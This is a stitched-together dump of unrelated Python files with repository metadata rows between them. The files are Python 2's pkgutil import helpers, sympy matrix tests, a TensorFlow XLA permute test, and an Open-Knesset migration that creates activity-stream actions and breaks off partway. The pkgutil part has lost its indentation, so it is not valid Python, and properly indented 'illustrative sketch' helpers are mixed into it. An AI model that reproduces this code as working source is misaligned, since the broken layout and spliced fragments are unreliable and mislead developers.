importers = map(get_importer, path)
yielded = {}
for i in importers:
for name, ispkg in iter_importer_modules(i, prefix):
if name not in yielded:
yielded[name] = 1
yield i, name, ispkg
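# Illustrative sketch, not part of the original module: the typical way
# iter_modules() is consumed.  The helper name '_list_submodules' is invented.
def _list_submodules(package_name):
    """Return the names of the direct submodules of an importable package."""
    __import__(package_name)
    package = sys.modules[package_name]
    pkg_path = getattr(package, '__path__', None) or []
    return [name for importer, name, ispkg in iter_modules(pkg_path,
                                                           package_name + '.')]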
#@simplegeneric
def iter_importer_modules(importer, prefix=''):
if not hasattr(importer, 'iter_modules'):
return []
return importer.iter_modules(prefix)
iter_importer_modules = simplegeneric(iter_importer_modules)
class ImpImporter:
"""PEP 302 Importer that wraps Python's "classic" import algorithm
ImpImporter(dirname) produces a PEP 302 importer that searches that
directory. ImpImporter(None) produces a PEP 302 importer that searches
the current sys.path, plus any modules that are frozen or built-in.
Note that ImpImporter does not currently support being used by placement
on sys.meta_path.
"""
def __init__(self, path=None):
self.path = path
def find_module(self, fullname, path=None):
# Note: we ignore 'path' argument since it is only used via meta_path
subname = fullname.split(".")[-1]
if subname != fullname and self.path is None:
return None
if self.path is None:
path = None
else:
path = [os.path.realpath(self.path)]
try:
file, filename, etc = imp.find_module(subname, path)
except ImportError:
return None
return ImpLoader(fullname, file, filename, etc)
def iter_modules(self, prefix=''):
if self.path is None or not os.path.isdir(self.path):
return
yielded = {}
import inspect
filenames = os.listdir(self.path)
filenames.sort() # handle packages before same-named modules
for fn in filenames:
modname = inspect.getmodulename(fn)
if modname=='__init__' or modname in yielded:
continue
path = os.path.join(self.path, fn)
ispkg = False
if not modname and os.path.isdir(path) and '.' not in fn:
modname = fn
for fn in os.listdir(path):
subname = inspect.getmodulename(fn)
if subname=='__init__':
ispkg = True
break
else:
continue # not a package
if modname and '.' not in modname:
yielded[modname] = 1
yield prefix + modname, ispkg
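# Illustrative sketch, not part of the original module: driving ImpImporter by hand
# to look a module up in one specific directory.  The helper name is invented.
def _find_in_directory(directory, module_name):
    """Return a loader for module_name found directly under directory, or None."""
    importer = ImpImporter(directory)
    return importer.find_module(module_name)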
class ImpLoader:
"""PEP 302 Loader that wraps Python's "classic" import algorithm
"""
code = source = None
def __init__(self, fullname, file, filename, etc):
self.file = file
self.filename = filename
self.fullname = fullname
self.etc = etc
def load_module(self, fullname):
self._reopen()
try:
mod = imp.load_module(fullname, self.file, self.filename, self.etc)
finally:
if self.file:
self.file.close()
# Note: we don't set __loader__ because we want the module to look
# normal; i.e. this is just a wrapper for standard import machinery
return mod
def get_data(self, pathname):
return open(pathname, "rb").read()
def _reopen(self):
if self.file and self.file.closed:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
self.file = open(self.filename, 'rU')
elif mod_type in (imp.PY_COMPILED, imp.C_EXTENSION):
self.file = open(self.filename, 'rb')
def _fix_name(self, fullname):
if fullname is None:
fullname = self.fullname
elif fullname != self.fullname:
raise ImportError("Loader for module %s cannot handle "
"module %s" % (self.fullname, fullname))
return fullname
def is_package(self, fullname):
fullname = self._fix_name(fullname)
return self.etc[2]==imp.PKG_DIRECTORY
def get_code(self, fullname=None):
fullname = self._fix_name(fullname)
if self.code is None:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
source = self.get_source(fullname)
self.code = compile(source, self.filename, 'exec')
elif mod_type==imp.PY_COMPILED:
self._reopen()
try:
self.code = read_code(self.file)
finally:
self.file.close()
elif mod_type==imp.PKG_DIRECTORY:
self.code = self._get_delegate().get_code()
return self.code
def get_source(self, fullname=None):
fullname = self._fix_name(fullname)
if self.source is None:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
self._reopen()
try:
self.source = self.file.read()
finally:
self.file.close()
elif mod_type==imp.PY_COMPILED:
if os.path.exists(self.filename[:-1]):
f = open(self.filename[:-1], 'rU')
self.source = f.read()
f.close()
elif mod_type==imp.PKG_DIRECTORY:
self.source = self._get_delegate().get_source()
return self.source
def _get_delegate(self):
return ImpImporter(self.filename).find_module('__init__')
def get_filename(self, fullname=None):
fullname = self._fix_name(fullname)
mod_type = self.etc[2]
if self.etc[2]==imp.PKG_DIRECTORY:
return self._get_delegate().get_filename()
elif self.etc[2] in (imp.PY_SOURCE, imp.PY_COMPILED, imp.C_EXTENSION):
return self.filename
return None
try:
import zipimport
from zipimport import zipimporter
def iter_zipimport_modules(importer, prefix=''):
dirlist = zipimport._zip_directory_cache[importer.archive].keys()
dirlist.sort()
_prefix = importer.prefix
plen = len(_prefix)
yielded = {}
import inspect
for fn in dirlist:
if not fn.startswith(_prefix):
continue
fn = fn[plen:].split(os.sep)
if len(fn)==2 and fn[1].startswith('__init__.py'):
if fn[0] not in yielded:
yielded[fn[0]] = 1
yield fn[0], True
if len(fn)!=1:
continue
modname = inspect.getmodulename(fn[0])
if modname=='__init__':
continue
if modname and '.' not in modname and modname not in yielded:
yielded[modname] = 1
yield prefix + modname, False
iter_importer_modules.register(zipimporter, iter_zipimport_modules)
except ImportError:
pass
def get_importer(path_item):
"""Retrieve a PEP 302 importer for the given path item
The returned importer is cached in sys.path_importer_cache
if it was newly created by a path hook.
If there is no importer, a wrapper around the basic import
machinery is returned. This wrapper is never inserted into
the importer cache (None is inserted instead).
The cache (or part of it) can be cleared manually if a
rescan of sys.path_hooks is necessary.
"""
try:
importer = sys.path_importer_cache[path_item]
except KeyError:
for path_hook in sys.path_hooks:
try:
importer = path_hook(path_item)
break
except ImportError:
pass
else:
importer = None
sys.path_importer_cache.setdefault(path_item, importer)
if importer is None:
try:
importer = ImpImporter(path_item)
except ImportError:
importer = None
return importer
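# Illustrative sketch, not part of the original module: get_importer() resolves one
# sys.path entry to its (cached) PEP 302 importer; probing each entry in turn is
# the essence of what iter_importers() below automates.  The helper name is
# invented.
def _first_path_entry_with(module_name):
    """Return the first sys.path entry whose importer can find module_name."""
    for entry in sys.path:
        importer = get_importer(entry)
        if importer is not None and importer.find_module(module_name) is not None:
            return entry
    return None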
def iter_importers(fullname=""):
"""Yield PEP 302 importers for the given module name
If fullname contains a '.', the importers will be for the package
containing fullname, otherwise they will be importers for sys.meta_path,
sys.path, and Python's "classic" import machinery, in that order. If
the named module is in a package, that package is imported as a side
effect of invoking this function.
Non PEP 302 mechanisms (e.g. the Windows registry) used by the
standard import machinery to find files in alternative locations
are partially supported, but are searched AFTER sys.path. Normally,
these locations are searched BEFORE sys.path, preventing sys.path
entries from shadowing them.
For this to cause a visible difference in behaviour, there must
be a module or package name that is accessible via both sys.path
and one of the non PEP 302 file system mechanisms. In this case,
the emulation will find the former version, while the builtin
import mechanism will find the latter.
Items of the following types can be affected by this discrepancy:
imp.C_EXTENSION, imp.PY_SOURCE, imp.PY_COMPILED, imp.PKG_DIRECTORY
"""
if fullname.startswith('.'):
raise ImportError("Relative module names not supported")
if '.' in fullname:
# Get the containing package's __path__
pkg = '.'.join(fullname.split('.')[:-1])
if pkg not in sys.modules:
__import__(pkg)
path = getattr(sys.modules[pkg], '__path__', None) or []
else:
for importer in sys.meta_path:
yield importer
path = sys.path
for item in path:
yield get_importer(item)
if '.' not in fullname:
yield ImpImporter()
def get_loader(module_or_name):
"""Get a PEP 302 "loader" object for module_or_name
If the module or package is accessible via the normal import
mechanism, a wrapper around the relevant part of that machinery
is returned. Returns None if the module cannot be found or imported.
If the named module is not already imported, its containing package
(if any) is imported, in order to establish the package __path__.
This function uses iter_importers(), and is thus subject to the same
limitations regarding platform-specific special import locations such
as the Windows registry.
"""
if module_or_name in sys.modules:
module_or_name = sys.modules[module_or_name]
if isinstance(module_or_name, ModuleType):
module = module_or_name
loader = getattr(module, '__loader__', None)
if loader is not None:
return loader
fullname = module.__name__
else:
fullname = module_or_name
return find_loader(fullname)
def find_loader(fullname):
"""Find a PEP 302 "loader" object for fullname
If fullname contains dots, path must be the containing package's __path__.
Returns None if the module cannot be found or imported. This function uses
iter_importers(), and is thus subject to the same limitations regarding
platform-specific special import locations such as the Windows registry.
"""
for importer in iter_importers(fullname):
loader = importer.find_module(fullname)
if loader is not None:
return loader
return None
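# Illustrative sketch, not part of the original module: once get_loader() has
# resolved a name to a PEP 302 loader, the loader can be asked for the module's
# source without executing it.  The helper name is invented.
def _module_source(module_name):
    """Return the source of module_name via its PEP 302 loader, or None."""
    loader = get_loader(module_name)
    if loader is None or not hasattr(loader, 'get_source'):
        return None
    return loader.get_source(module_name)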
def extend_path(path, name):
"""Extend a package's path.
Intended use is to place the following code in a package's __init__.py:
from pkgutil import extend_path
__path__ = extend_path(__path__, __name__)
This will add to the package's __path__ all subdirectories of
directories on sys.path named after the package. This is useful
if one wants to distribute different parts of a single logical
package as multiple directories.
It also looks for *.pkg files beginning where * matches the name
argument. This feature is similar to *.pth files (see site.py),
except that it doesn't special-case lines starting with 'import'.
A *.pkg file is trusted at face value: apart from checking for
duplicates, all entries found in a *.pkg file are added to the
    path, regardless of whether they exist on the filesystem. (This
is a feature.)
If the input path is not a list (as is the case for frozen
packages) it is returned unchanged. The input path is not
modified; an extended copy is returned. Items are only appended
to the copy at the end.
It is assumed that sys.path is a sequence. Items of sys.path that
are not (unicode or 8-bit) strings referring to existing
directories are ignored. Unicode items of sys.path that cause
errors when used as filenames may cause this function to raise an
exception (in line with os.path.isdir() behavior).
"""
if not isinstance(path, list):
# This could happen e.g. when this is called from inside a
# frozen package. Return the path unchanged in that case.
return path
pname = os.path.join(*name.split('.')) # Reconstitute as relative path
# Just in case os.extsep != '.'
sname = os.extsep.join(name.split('.'))
sname_pkg = sname + os.extsep + "pkg"
init_py = "__init__" + os.extsep + "py"
path = path[:] # Start with a copy of the existing path
for dir in sys.path:
if not isinstance(dir, basestring) or not os.path.isdir(dir):
continue
subdir = os.path.join(dir, pname)
# XXX This may still add duplicate entries to path on
# case-insensitive filesystems
initfile = os.path.join(subdir, init_py)
if subdir not in path and os.path.isfile(initfile):
path.append(subdir)
# XXX Is this the right thing for subpackages like zope.app?
# It looks for a file named "zope.app.pkg"
pkgfile = os.path.join(dir, sname_pkg)
if os.path.isfile(pkgfile):
try:
f = open(pkgfile)
except IOError, msg:
sys.stderr.write("Can't open %s: %s\n" %
(pkgfile, msg))
else:
for line in f:
line = line.rstrip('\n')
if not line or line.startswith('#'):
continue
path.append(line) # Don't check for existence!
f.close()
return path
def get_data(package, resource):
"""Get a resource from a package.
This is a wrapper round the PEP 302 loader get_data API. The package
argument should be the name of a package, in standard module format
(foo.bar). The resource argument should be in the form of a relative
filename, using '/' as the path separator. The parent directory name '..'
is not allowed, and nor is a rooted name (starting with a '/').
The function returns a binary string, which is the contents of the
specified resource.
For packages located in the filesystem, which have already been imported,
this is the rough equivalent of
d = os.path.dirname(sys.modules[package].__file__)
data = open(os.path.join(d, resource), 'rb').read()
If the package cannot be located or loaded, or it uses a PEP 302 loader
which does not support get_data(), then None is returned.
"""
loader = get_loader(package)
if loader is None or not hasattr(loader, 'get_data'):
return None
mod = sys.modules.get(package) or loader.load_module(package)
if mod is None or not hasattr(mod, '__file__'):
return None
# Modify the resource name to be compatible with the loader.get_data
# signature - an os.path format "filename" starting with the dirname of
# the package's __file__
parts = resource.split('/')
parts.insert(0, os.path.dirname(mod.__file__))
resource_name = os.path.join(*parts)
return loader.get_data(resource_name)
| apache-2.0 | -8,815,676,701,688,771,000 | 33.307033 | 79 | 0.60102 | false |
debugger22/sympy | sympy/matrices/tests/test_interactions.py | 58 | 1881 | """
We have a few different kinds of Matrices
Matrix, ImmutableMatrix, MatrixExpr
Here we test the extent to which they cooperate
"""
from sympy import symbols
from sympy.matrices import (Matrix, MatrixSymbol, eye, Identity,
ImmutableMatrix)
from sympy.core.compatibility import range
from sympy.matrices.expressions import MatrixExpr, MatAdd
from sympy.matrices.matrices import classof
from sympy.utilities.pytest import raises
SM = MatrixSymbol('X', 3, 3)
MM = Matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
IM = ImmutableMatrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
meye = eye(3)
imeye = ImmutableMatrix(eye(3))
ideye = Identity(3)
a, b, c = symbols('a,b,c')
def test_IM_MM():
assert isinstance(MM + IM, ImmutableMatrix)
assert isinstance(IM + MM, ImmutableMatrix)
assert isinstance(2*IM + MM, ImmutableMatrix)
assert MM.equals(IM)
def test_ME_MM():
assert isinstance(Identity(3) + MM, MatrixExpr)
assert isinstance(SM + MM, MatAdd)
assert isinstance(MM + SM, MatAdd)
assert (Identity(3) + MM)[1, 1] == 6
def test_equality():
a, b, c = Identity(3), eye(3), ImmutableMatrix(eye(3))
for x in [a, b, c]:
for y in [a, b, c]:
assert x.equals(y)
def test_matrix_symbol_MM():
X = MatrixSymbol('X', 3, 3)
Y = eye(3) + X
assert Y[1, 1] == 1 + X[1, 1]
def test_indexing_interactions():
assert (a * IM)[1, 1] == 5*a
assert (SM + IM)[1, 1] == SM[1, 1] + IM[1, 1]
assert (SM * IM)[1, 1] == SM[1, 0]*IM[0, 1] + SM[1, 1]*IM[1, 1] + \
SM[1, 2]*IM[2, 1]
def test_classof():
A = Matrix(3, 3, range(9))
B = ImmutableMatrix(3, 3, range(9))
C = MatrixSymbol('C', 3, 3)
assert classof(A, A) == Matrix
assert classof(B, B) == ImmutableMatrix
assert classof(A, B) == ImmutableMatrix
assert classof(B, A) == ImmutableMatrix
raises(TypeError, lambda: classof(A, C))
| bsd-3-clause | -973,157,637,153,099,300 | 27.074627 | 71 | 0.621478 | false |
hehongliang/tensorflow | tensorflow/compiler/tests/permute_test.py | 16 | 3387 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the DataFormatVecPermute operator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests import xla_test
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import test
class XlaPermuteOpTest(xla_test.XLATestCase):
def _runPermuteAndCompare(self, x, src_format, dst_format, expected):
with self.cached_session() as session:
with self.test_scope():
placeholder = array_ops.placeholder(dtypes.as_dtype(x.dtype), x.shape)
param = {placeholder: x}
output = nn_ops.data_format_vec_permute(
placeholder, src_format=src_format, dst_format=dst_format)
result = session.run(output, param)
self.assertAllEqual(result, expected)
def testNHWCToNCHW(self):
for dtype in {np.int32, np.int64}:
x = np.array([7, 4, 9, 3], dtype=dtype)
self._runPermuteAndCompare(x, "NHWC", "NCHW", [7, 3, 4, 9])
def testNCHWToNHWC(self):
for dtype in {np.int32, np.int64}:
x = np.array([7, 4, 9, 3], dtype=dtype)
self._runPermuteAndCompare(x, "NCHW", "NHWC", [7, 9, 3, 4])
def testNHWCToHWNC(self):
for dtype in {np.int32, np.int64}:
x = np.array([7, 4, 9, 3], dtype=dtype)
self._runPermuteAndCompare(x, "NHWC", "HWNC", [4, 9, 7, 3])
def testHWNCToNHWC(self):
for dtype in {np.int32, np.int64}:
x = np.array([7, 4, 9, 3], dtype=dtype)
self._runPermuteAndCompare(x, "HWNC", "NHWC", [9, 7, 4, 3])
def testNHWCToNCHW2D(self):
for dtype in {np.int32, np.int64}:
x = np.array([[7, 4], [9, 3], [4, 5], [5, 1]], dtype=dtype)
self._runPermuteAndCompare(x, "NHWC", "NCHW",
[[7, 4], [5, 1], [9, 3], [4, 5]])
def testNHWCToHWNC2D(self):
for dtype in {np.int32, np.int64}:
x = np.array([[7, 4], [9, 3], [4, 5], [5, 1]], dtype=dtype)
self._runPermuteAndCompare(x, "NHWC", "HWNC",
[[9, 3], [4, 5], [7, 4], [5, 1]])
def testHWNCToNHWC2D(self):
for dtype in {np.int32, np.int64}:
x = np.array([[7, 4], [9, 3], [4, 5], [5, 1]], dtype=dtype)
self._runPermuteAndCompare(x, "HWNC", "NHWC",
[[4, 5], [7, 4], [9, 3], [5, 1]])
def testNCHWToNHWC2D(self):
for dtype in {np.int32, np.int64}:
x = np.array([[7, 4], [9, 3], [4, 5], [5, 1]], dtype=dtype)
self._runPermuteAndCompare(x, "NCHW", "NHWC",
[[7, 4], [4, 5], [5, 1], [9, 3]])
if __name__ == "__main__":
test.main()
| apache-2.0 | 8,228,656,646,681,334,000 | 37.488636 | 80 | 0.599941 | false |
Shrulik/Open-Knesset | mks/migrations/0009_add_action_stream.py | 10 | 28666 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
from django.utils.encoding import force_unicode
class Migration(DataMigration):
def _get_FIELD_display(self, field):
value = getattr(self, field.attname)
return force_unicode(dict(field.flatchoices).get(value, value), strings_only=True)
depends_on = (
('committees', '0001_startapp_committees'),
('laws', '0001_initial'),
)
def forwards(self, orm):
from actstream import action
        print 'adding committee actions'
for c in orm['committees.CommitteeMeeting'].objects.all():
for m in c.mks_attended.all():
action.send(m, verb='attended', target=c,
description='committee meeting', timestamp=c.date)
        print 'adding posts actions'
for f in orm['planet.Feed'].objects.all():
member = orm.Member.objects.get(pk=orm['links.Link'].objects.get(url=f.url).object_pk)
for p in f.post_set.all():
action.send(member, verb='posted', target=p, timestamp=p.date_modified or p.date_created)
print 'adding votes actions (may take a while)'
from laws.models import VOTE_ACTION_TYPE_CHOICES
choice_dict = dict(VOTE_ACTION_TYPE_CHOICES)
for instance in orm['laws.VoteAction'].objects.all():
action.send(instance.member, verb='voted',
description=unicode(choice_dict[instance.type]),
target=instance.vote,
timestamp=instance.vote.time)
def backwards(self, orm):
"Write your backwards methods here."
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'committees.committee': {
'Meta': {'object_name': 'Committee'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'committees'", 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'committees.committeemeeting': {
'Meta': {'object_name': 'CommitteeMeeting'},
'committee': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['committees.Committee']"}),
'date': ('django.db.models.fields.DateField', [], {}),
'date_string': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mks_attended': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'committee_meetings'", 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'protocol_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'topics': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'votes_mentioned': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'committee_meetings'", 'blank': 'True', 'to': "orm['laws.Vote']"})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'laws.knessetproposal': {
'Meta': {'object_name': 'KnessetProposal'},
'booklet_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'committee': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'to': "orm['committees.Committee']"}),
'committee_meetings': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_knessetproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['committees.CommitteeMeeting']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'knesset_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'law': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'laws_knessetproposal_related'", 'null': 'True', 'to': "orm['laws.Law']"}),
'originals': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'knesset_proposals'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.PrivateProposal']"}),
'source_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_knessetproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.Vote']"})
},
'laws.law': {
'Meta': {'object_name': 'Law'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'})
},
'laws.membervotingstatistics': {
'Meta': {'object_name': 'MemberVotingStatistics'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'voting_statistics'", 'unique': 'True', 'to': "orm['mks.Member']"})
},
'laws.partyvotingstatistics': {
'Meta': {'object_name': 'PartyVotingStatistics'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'party': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'voting_statistics'", 'unique': 'True', 'to': "orm['mks.Party']"})
},
'laws.privateproposal': {
'Meta': {'object_name': 'PrivateProposal'},
'committee_meetings': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_privateproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['committees.CommitteeMeeting']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'joiners': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills_joined'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'knesset_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'law': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'laws_privateproposal_related'", 'null': 'True', 'to': "orm['laws.Law']"}),
'proposal_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'proposers': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'bills'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['mks.Member']"}),
'source_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'laws_privateproposal_related'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['laws.Vote']"})
},
'laws.vote': {
'Meta': {'object_name': 'Vote'},
'against_party': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'controversy': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'full_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_text_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'importance': ('django.db.models.fields.FloatField', [], {}),
'meeting_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'src_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'src_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'time': ('django.db.models.fields.DateTimeField', [], {}),
'time_string': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'vote_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'votes'", 'blank': 'True', 'through': "orm['laws.VoteAction']", 'to': "orm['mks.Member']"}),
'votes_count': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'laws.voteaction': {
'Meta': {'object_name': 'VoteAction'},
'against_coalition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'against_opposition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'against_party': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Member']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'vote': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['laws.Vote']"})
},
'links.link': {
'Meta': {'object_name': 'Link'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_link'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['links.LinkType']", 'null': 'True', 'blank': 'True'}),
'object_pk': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'links.linktype': {
'Meta': {'object_name': 'LinkType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'mks.correlation': {
'Meta': {'object_name': 'Correlation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'm1': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'m1'", 'to': "orm['mks.Member']"}),
'm2': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'m2'", 'to': "orm['mks.Member']"}),
'normalized_score': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'not_same_party': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'mks.member': {
'Meta': {'object_name': 'Member'},
'area_of_residence': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'blog': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['planet.Blog']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'current_party': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'members'", 'null': 'True', 'to': "orm['mks.Party']"}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_of_death': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'family_status': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True'}),
